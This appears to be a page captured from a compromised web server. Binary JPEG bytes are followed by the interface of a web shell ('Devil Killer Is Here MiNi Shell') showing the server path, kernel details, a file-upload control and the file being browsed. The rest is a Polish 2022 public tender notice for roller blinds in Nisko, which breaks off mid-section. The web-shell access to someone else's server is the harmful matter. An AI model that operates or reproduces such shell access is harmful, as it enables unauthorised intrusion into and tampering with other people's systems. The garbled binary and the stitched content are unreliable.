JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20220303/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20220303/0007401401-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa i montaż rolet wewnętrznych do kwater internatowych w Nisku </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Agencja Mienia Wojskowego</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 011263946</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Nowowiejska 26A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-911</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">dzp.lu@amw.com.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://amw.com.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - agencja wykonawcza</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Zarządzanie mieniem skarbu państwa </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa i montaż rolet wewnętrznych do kwater internatowych w Nisku </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-788ef8cd-9a11-11ec-baa2-b6d934483bfb</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00074014</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-03-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00059886/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.27 Rolety, żaluzje, verticale, moskitiery - OR Lublin</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://amw.com.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. Postępowanie prowadzone<br/>jestwjęzyku polskim.2. Komunikacja między Zamawiającym a Wykonawcami odbywa się<br/>wyłącznieprzyużyciu środków komunikacji elektronicznej zgodnie z art. 61 ustawy, za<br/>pośrednictwemelektronicznejplatformy zakupowej (dalej: „Platforma” lub „Platforma Zakupowa”)<br/>podadresem:https://amw.eb2b.com.pl, która spełnia wymagania opisane w art. 64 ustawy lub przy<br/>użyciupocztyelektronicznej (e-mail) na adres wskazany w Rozdziale I SWZ, za wyjątkiem<br/>przypadkówwskazanychw SWZ. Oferty oraz oświadczenia i dokumenty składane wraz z ofertą należy<br/>składać tylko i wyłącznie przy użyciu Platformy. Strona internetowa<br/>prowadzonegopostępowaniahttps://amw.eb2b.com.pl/open-auctions.html</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wykonawca<br/>zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego,musi posiadać konto<br/>na Platformie Zakupowej. Zarejestrowanie i utrzymywanie konta na Platformie Zakupowej oraz<br/>korzystanie z Platformy jest bezpłatne.4. Wymagania techniczne i organizacyjne korzystania z Platformy<br/>Zakupowej określa Regulamin Platformy Zakupowej (dostępny pod adresem internetowym<br/>https://amw.eb2b.com.pl/cms/page/id/terms-and-conditions). Wykonawca przystępując do postępowania<br/>o udzielenie zamówienia publicznego tj. bezpłatnie rejestrując się lublogując (wprzypadku posiadania<br/>konta w Platformie Zakupowej), akceptuje warunki korzystania zPlatformy,określone w Regulaminie<br/>oraz uznaje go za wiążący.5. Instrukcja korzystania z Platformy:1)wzakładce „Postępowania”, dalej<br/>„Lista postępowań otwartych” wykonawca wybieraniniejszepostępowanie o nr DZPOL.<br/>2616.23.2022oraz korzystając z polecenia „Zgłoś się do udziału w postępowaniu” przechodzi<br/>odpowiednio do Formularza rejestracyjnego – w przypadku,kiedywykonawca nie posiada konta na<br/>Platformie, lub<br/>panelu logowania użytkownika do Systemu w przypadku posiadania konta na Platformie;2) po<br/>wypełnieniu formularza rejestracyjnegowykonawcaotrzymuje wiadomość elektroniczną (e-mail)<br/>informującą, że może dokonać pierwszego logowania do Platformy. Rejestracja nowego konta podlega<br/>weryfikacji i<br/>akceptacjiOperatora, któramoże potrwać do24h (8h roboczych).3) zgłoszenie do postępowania<br/>wymagazalogowaniaWykonawcy do Platformy.Po wprowadzeniu danych użytkownika tj. adresu e-mail<br/>orazhasłazgłoszenie jest automatycznieakceptowane przez Platformę;4) w<br/>zakładce„Załączniki”przedmiotowego postępowania dostępna jestdokumentacja postępowania (SWZ<br/>orazpozostałedokumenty). Pobranie dokumentu następuje pokliknięciu na wybrany załącznik i<br/>wciśnięciupolecenia„Pobierz”. W celu pobrania wszystkichzałączników jednocześnie należy wybrać<br/>polecenie„Pobierzpaczkę”, a następnie „Pobierz wszystkiezałączniki organizatora”.5) Zakładka<br/>„Załączniki” służyrównieżWykonawcom do złożenia oferty orazdokumentów lub oświadczeń<br/>składanych razem z ofertą.6) Zadatę wpływu oferty, wniosków,zawiadomień, dokumentów, oświadczeń<br/>oraz innych informacjiprzyjmujesię datę ich zamieszczeniana Platformie. 7) Zaleca się, aby<br/>Wykonawca na bieżącośledził(sugerujemy codziennie) zmiany jakichw trakcie postępowania może<br/>dokonać Zamawiający.Zaleceniedotyczy również informacji jakieZamawiający kieruje do Wykonawców<br/>po zakończeniuskładaniaofert.6. Niezbędne wymaganiasprzętowo-aplikacyjne umożliwiające pracę na<br/>Platformie:1)stały dostępdo sieci Internet ogwarantowanej przepustowości nie mniejszej niż 4/1 mb/s,2)<br/>komputerklasy PC lubMac, onastępującej konfiguracji: pamięć RAM min. 8 GB, procesor Intel IV 4GHz,<br/>jedenzsystemówoperacyjnych: MS Windows 7, Mac OS x 10.4, Linux, lub ich<br/>nowszewersje,3)zainstalowana dowolnanajnowsza wersja przeglądarki internetowej; w przypadku<br/>InternetExplorerminimalnie wersja 11.0.4)włączona obsługa JavaScript,5) zainstalowany<br/>programobsługującystosowane przez wykonawcęformaty plików (np. Acrobat Reader dla plików w<br/>formacie.pdf).7.Wszelkie dokumenty, oświadczenia,informacje składane za pośrednictwem Platformy,<br/>należywczytaćjako załączniki, według Instrukcjikorzystania z Platformy, dostępnej dla<br/>zalogowanychużytkowników wzakładce „Pomoc” –„Instrukcje”.8. Dokumenty elektroniczne,<br/>oświadczenia lubelektroniczne kopiedokumentów luboświadczeń składające się na ofertę (składane<br/>przez Wykonawcędo upływu terminuskładania ofert),przekazywane są na Platformę przy użyciu<br/>zakładki „Załączniki”.9.Dokumentyelektroniczne,oświadczenia, uzupełnienia, elektroniczne kopie<br/>dokumentów lub oświadczeńskładaneprzezWykonawcę po terminie składania ofert (np. na wezwanie<br/>Zamawiającego), składane sąnaPlatformęprzy użyciu zakładki „Pytania/informacje”Dalszy ciąg w sekcji<br/>iX-Pozostałe informacje</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art.13 ust.1 i 2<br/>rozporządzeniaParlamentuEuropejskiego i Rady UE 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony<br/>osóbfizycznych w związkuz przetwarzaniem danych osobowych i w sprawie swobodnego przepływu<br/>takichdanych oraz uchyleniadyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych-<br/>Dz.Urz.UEL119 z 04.05.2016, str.1),dalej RODO, informuję, że administratorem Pani/Pana danych<br/>osobowychjest że: administratoremPani/Pana danych osobowych jest Agencja Mienia Wojskowego z<br/>siedzibą przyul. Nowowiejskiej 26 A,00-911 WarszawaAdministrator wyznaczył Inspektorem Ochrony<br/>Danych, zktórym może się Pani/Pankontaktować w sprawach związanych z ochrona danych poprzez<br/>pocztęelektroniczną na adres:iod@amw.com.pl lub listownie na adres Agencji Mienia Wojskowego,<br/>ul.Nowowiejska 26A, 00-911Warszawa, z dopiskiem „Inspektor Ochrony Danych”;Pani/Pana<br/>daneosobowe przetwarzane będą napodstawie art. 6 ust.1 lit.c RODO w celu prowadzenia<br/>przedmiotowegopostępowania o udzieleniezamówienia publicznego oraz zawarcia umowy, a podstawą<br/>prawną ichprzetwarzania jest obowiązekprawny stosowania sformalizowanych procedur udzielania<br/>zamówieńpublicznych spoczywający naZamawiającym;Odbiorcami Pani/Pana danych osobowych<br/>będą osobylub podmioty, którymudostępniona zostanie dokumentacja postępowania w oparciu o art.18<br/>oraz art.74 ustawyPzp;Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy<br/>Pzp,przez okres4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas<br/>trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania<br/>umowy;Obowiązekpodania przezPanią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących<br/>jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w<br/>postępowaniu oudzieleniezamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawyPzp;Wodniesieniu do Pani/a danych osobowych decyzje nie będą podejmowane w<br/>sposóbzautomatyzowany,stosowanie do art. 22 RODO;Posiada Pan/i:•na podstawie art.15 RODO<br/>prawodostępu do danychosobowych Pani/a dotyczących;•na podstawie art.16 RODO prawo do<br/>sprostowanialub uzupełnieniaPani/Pana danych osobowych, przy czym skorzystanie z prawa do<br/>sprostowania lubuzupełnienia niemoże skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznegoani zmianąpostanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie<br/>może naruszaćintegralnościprotokołu oraz jego załączników.•na podstawie art.18 RODO prawo<br/>żądania odadministratoraograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków,<br/>o którychmowa w art.18ust.2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma<br/>zastosowania wodniesieniu doprzechowywania, w celu zapewnienia korzystania ze środków ochrony<br/>prawnej lub wcelu ochronypraw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy<br/>interesupublicznego UniiEuropejskiej lub państwa członkowskiego, a także nie ogranicza przetwarzania<br/>danychosobowych doczasu zakończenia postępowania o udzielenie zamówienia.•prawo do wniesienia<br/>skargido PrezesaUrzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie<br/>danychosobowych Pani/adotyczących narusza przepisy RODO;Nie przysługuje Pani/u:•w związku z<br/>art.17ust.3 lit.b,d lub eRODO prawo do usunięcia danych osobowych;•prawo do przenoszenia<br/>danychosobowych, o którymmowa w art. 20 RODO;•na podstawie art.21 RODO prawo sprzeciwu,<br/>wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowychjest art.6 ust.1 lit.cRODO.Jednocześnie Zamawiający przypomina o ciążącym na Pani/u<br/>obowiązkuinformacyjnymwynikającym z art.14 RODO względem osób fizycznych, których dane<br/>przekazane zostaną Zamawiającemu w związku z prowadzonym postępowaniem i które Zamawiający<br/>pośredniopozyskaod wykonawcy biorącego udział w postępowaniu, chyba że ma zastosowanie co<br/>najmniej jedno z wyłączeń, o których mowa w art.14 ust.5 RODO</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Posiada Pan/Pani: na podstawie art.<br/>18RODOprawożądania od administratora ograniczenia przetwarzania danych<br/>osobowychzzastrzeżeniemprzypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo<br/>doograniczeniaprzetwarzanianie ma zastosowania w odniesieniu do przechowywania, w<br/>celuzapewnienia korzystaniaze środkówochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lubprawnej, lub z uwagi naważnewzględy interesu publicznego Unii Europejskiej lub<br/>państwaczłonkowskiego, a także nieograniczaprzetwarzania danych osobowych do czasu<br/>zakończeniapostępowania o udzieleniezamówienia. Nieprzysługuje Pani/Panu: w<br/>związku z art. 17 ust. 3lit. b, d lub e RODO prawo dousunięcia danych osobowych;<br/>prawo do przenoszenia danychosobowych, o którym mowa w art.20 RODO;<br/>na podstawie art. 21 RODO prawo sprzeciwu,wobec przetwarzania danych osobowych,gdyż<br/>podstawą prawną przetwarzania Pani/Pana danychosobowych jest art. 6 ust. 1 lit. c<br/>RODO.10.JednocześnieZamawiający przypomina o ciążącym naPani/Panu obowiązku<br/>informacyjnym wynikającym z art. 14RODO względem osób fizycznych, którychdane przekazane<br/>zostanąZamawiającemu w związku zprowadzonym postępowaniem i któreZamawiający pośrednio<br/>pozyska odwykonawcy biorącego udziałw postępowaniu, chyba że ma zastosowanie co najmniej jedno<br/>z wyłączeń, o których mowa w art. 14ust. 5 RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">DZP- OL.2616.23.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa oraz montaż rolet wewnętrznych w nowych kwaterach internatowych w Nisku </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39515400-9 - Rolety</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">20 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">wskazany w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin realizacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych<br/>środków dowodowych, aktualnych na dzień ich złożenia:1) Oświadczenie wykonawcy, w zakresie<br/>art.108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o<br/>ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076), z<br/>innymwykonawcą, który złożył ofertę częściową, albo oświadczenia o przynależności do tej samej<br/>Ogłoszenie nr 2022/BZP 00072319/01 z dnia 2022-03-02<br/>2022-03-02 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Dostawy<br/>grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty<br/>częściowej,w postępowaniu niezależnie od innego wykonawcy należącego do tej samej grupy<br/>kapitałowej – załącznik nr 4 do SWZ;2) Odpis lub informacja z Krajowego Rejestru Sądowego lub z<br/>Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4<br/>ustawy,sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy<br/>wymagają wpisu do rejestru lub ewidencji</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Pełnomocnictwo upoważniające do podpisania oferty, o ile ofertę podpisuje<br/>pełnomocnik;2)Pełnomocnictwo do reprezentowania w postępowaniu Wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia – jeżeli dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o<br/>zamówienie przez Wykonawców, oświadczenie to składa każdy z Wykonawców oświadczenie<br/>Wykonawcy o niepodleganiu wykluczeniu z postępowania oraz spełnieniu warunków udziału<br/>w postępowaniu - wzór oświadczenia stanowi Załącznik nr 3 do SWZ. Zamawiający żąda od<br/>Wykonawcy wspólnie ubiegających się o udzielenie zamówienia - składa każdy z Wykonawców<br/>odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do<br/>rejestru lub ewidencji. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których<br/>mowa powyżej, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i<br/>ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych<br/>dokumentów <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający na podstawie art. 455 ustawy przewiduje możliwość dokonania zmiany zawartej<br/>umowy, wyłącznie w zakresie dopuszczalnym przepisami Ustawy, za zgodą obu Stron, w<br/>okolicznościach wskazanych w projektowanych postanowieniach umowy stanowiących<br/>załącznik nr 5 do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – 